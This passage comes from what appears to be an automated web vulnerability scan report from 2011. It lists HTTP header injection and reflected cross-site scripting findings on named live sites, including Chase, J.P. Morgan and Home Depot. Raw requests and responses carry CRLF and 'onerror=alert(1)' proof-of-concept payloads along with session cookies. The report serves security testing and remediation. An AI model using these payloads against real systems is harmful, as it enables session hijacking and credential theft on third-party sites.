GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs11845888246316%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D12%252F6%252F2011%252012%253A59%253A8%25202%2520300%26pageName%3Ditunes%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c1%3Dmusic%2520-%2520sep%25202010%2520%28us%29%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26c5%3Dwin32%26c6%3DD%253D%2522%253A%2520%2522%252BpageName%26c9%3Dwindows%26c12%3Dno%2520itunes%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c25%3Dother%2520nav%2520or%2520none%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D3%26s%3D1920x1200%26c%3D32%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1065%26bh%3D823%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1d4dd7%0d%0a1d25cb0b3ad&A2S=1;ord=22175180 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316?AQB=1&vvpr=true&&ndh=1&t=12%2F6%2F2011%2012%3A59%3A8%202%20300&pageName=itunes%20-%20index%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.itunes&c1=music%20-%20sep%202010%20(us)&c4=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&c5=win32&c6=D%3D%22%3A%20%22%2BpageName&c9=windows&c12=no%20itunes&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c25=other%20nav%20or%20none&c44=appleglobal%2Cappleitunes%2Cappleusitunesipod&c48=1&c49=D%3Ds_vi&c50=itunes%3D3&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=823&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1d4dd7
1d25cb0b3ad&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1310493572:
Date: Tue, 12 Jul 2011 17:59:32 GMT
Server: GFE/2.0
Content-Type: text/html

2.3. https://locator.chase.com/LocatorAction.do [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://locator.chase.com
Path:	/LocatorAction.do

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22ef1%0d%0a7769e8f9510 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22ef1%0d%0a7769e8f9510;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 12 Jul 2011 16:09:43 GMT
Server: Apache
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: /22ef1
7769e8f9510;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

2.4. https://locator.chase.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://locator.chase.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7b17c%0d%0ac7e1c72fd84 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7b17c%0d%0ac7e1c72fd84 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8EEB941FE1274DFCE21BE8CFDBAF22F9.ftc-web1

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 12 Jul 2011 16:09:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=3E400342F5CBBAA525EA57380B24E1E9.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: /7b17c
c7e1c72fd84;jsessionid=3E400342F5CBBAA525EA57380B24E1E9.ftc-web3
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

2.5. https://locator.chase.com/jsp/SearchPage.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://locator.chase.com
Path:	/jsp/SearchPage.jsp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 64242%0d%0a98bbc6ba98b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /64242%0d%0a98bbc6ba98b/SearchPage.jsp HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=23ECC4A4BD991387CE19963C8C5BA577.ftc-web4

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 12 Jul 2011 16:10:31 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD669E70F19B7B9016BF9ACB421F449B.ftc-web4; Path=/; Secure
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: /64242
98bbc6ba98b/SearchPage.jsp;jsessionid=BD669E70F19B7B9016BF9ACB421F449B.ftc-web4
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

3. Cross-site scripting (reflected) previous next
There are 36 instances of this issue:

https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [REST URL parameter 2]
https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [REST URL parameter 3]
https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [TARGET parameter]
http://community.homedepot.com/restapi/vc/boards/id/Maintenance [callback parameter]
http://community.homedepot.com/restapi/vc/boards/id/build [callback parameter]
http://community.homedepot.com/restapi/vc/boards/id/lawns [callback parameter]
http://community.homedepot.com/restapi/vc/boards/id/replace [callback parameter]
http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [ActiveFlagCrit parameter]
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [Address parameter]
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [AgentName parameter]
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [EntityName parameter]
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [EntitySearchMethod parameter]
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [FirstName parameter]
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [LastName parameter]
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [MiddleName parameter]
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [Purpose parameter]
http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [SearchType parameter]
http://ucc.state.ri.us/loginsystem/login.asp [FilingMethod parameter]
http://ucc.state.ri.us/ucc/uccmenu.asp [FilingMethod parameter]
https://www.chase.com/ccp/index.jsp [name of an arbitrarily supplied request parameter]
https://www.chase.com/ccp/index.jsp [targeturl parameter]
https://www.chase.com/index.jsp [targeturl parameter]
https://www.chase.com/index.jsp [zipcode parameter]
http://www.ct.gov/demhs/site/default.asp [name of an arbitrarily supplied request parameter]
http://www.mass.gov/ [L2 parameter]
http://www.mass.gov/ [L3 parameter]
http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter]
http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter]
http://apps.ccbill.com/ [cookieLetterSize cookie]
http://apps.ccbill.com/ [cookiePageWidth cookie]
http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html [cookieLetterSize cookie]
http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html [cookiePageWidth cookie]
http://apps.ccbill.com/p/developer.html [cookieLetterSize cookie]
http://apps.ccbill.com/p/developer.html [cookiePageWidth cookie]
http://www.jpmorganaccess.com/ [name of an arbitrarily supplied request parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://access.jpmorgan.com
Path:	/appmanager/jpmalogonportal/jpmalogonhome

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1ad44(a)706815c84f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appmanager/jpmalogonportal1ad44(a)706815c84f/jpmalogonhome?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome&brand=jpma HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma

Response

HTTP/1.1 404 Not Found
Date: Tue, 12 Jul 2011 16:31:12 GMT
Server: Apache
Content-Length: 96
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Resource /jpmalogonportal1ad44(a)706815c84f/jpmalogonhome could not be resolved for locale null.

3.2. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://access.jpmorgan.com
Path:	/appmanager/jpmalogonportal/jpmalogonhome

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9fa1a(a)6d1551bfcb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /appmanager/jpmalogonportal/jpmalogonhome9fa1a(a)6d1551bfcb1?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome&brand=jpma HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma

Response

HTTP/1.1 404 Not Found
Date: Tue, 12 Jul 2011 16:31:18 GMT
Server: Apache
Content-Length: 97
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Resource /jpmalogonportal/jpmalogonhome9fa1a(a)6d1551bfcb1 could not be resolved for locale null.

3.3. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [TARGET parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://access.jpmorgan.com
Path:	/appmanager/jpmalogonportal/jpmalogonhome

Issue detail

The value of the TARGET request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f722"%20a%3db%20200316abca was submitted in the TARGET parameter. This input was echoed as 9f722" a=b 200316abca in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /appmanager/jpmalogonportal/jpmalogonhome?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome9f722"%20a%3db%20200316abca&brand=jpma HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:31:00 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome9f722" a=b 200316abca; domain=.jpmorgan.com; path=/; secure
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 34403

<html>

<head>

<title>J.P. Morgan ACCESS</title><link rel="stylesheet" href="/framework/skins/jpmaskin/r3/css/jpmalogon.css" type="text/css"><link type="image/x-icon" rel="shortcut ic
...[SNIP]...
<input type="hidden" name="target" value="https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome9f722" a=b 200316abca"/>
...[SNIP]...

3.4. http://community.homedepot.com/restapi/vc/boards/id/Maintenance [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.homedepot.com
Path:	/restapi/vc/boards/id/Maintenance

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e6afc<img%20src%3da%20onerror%3dalert(1)>81e5cad2eb0 was submitted in the callback parameter. This input was echoed as e6afc<img src=a onerror=alert(1)>81e5cad2eb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/Maintenance?xslt=json.xsl&callback=jsonp1310488529624e6afc<img%20src%3da%20onerror%3dalert(1)>81e5cad2eb0 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 653
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp1310488529624e6afc<img src=a onerror=alert(1)>81e5cad2eb0({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/Maintenance","id":{"type":"string","$":"Maintenance"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"s
...[SNIP]...

3.5. http://community.homedepot.com/restapi/vc/boards/id/build [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.homedepot.com
Path:	/restapi/vc/boards/id/build

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8d1a9<img%20src%3da%20onerror%3dalert(1)>02e074b4b25 was submitted in the callback parameter. This input was echoed as 8d1a9<img src=a onerror=alert(1)>02e074b4b25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/build?xslt=json.xsl&callback=jsonp13104885296198d1a9<img%20src%3da%20onerror%3dalert(1)>02e074b4b25 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 600
Connection: close
Content-Type: application/json;charset=UTF-8

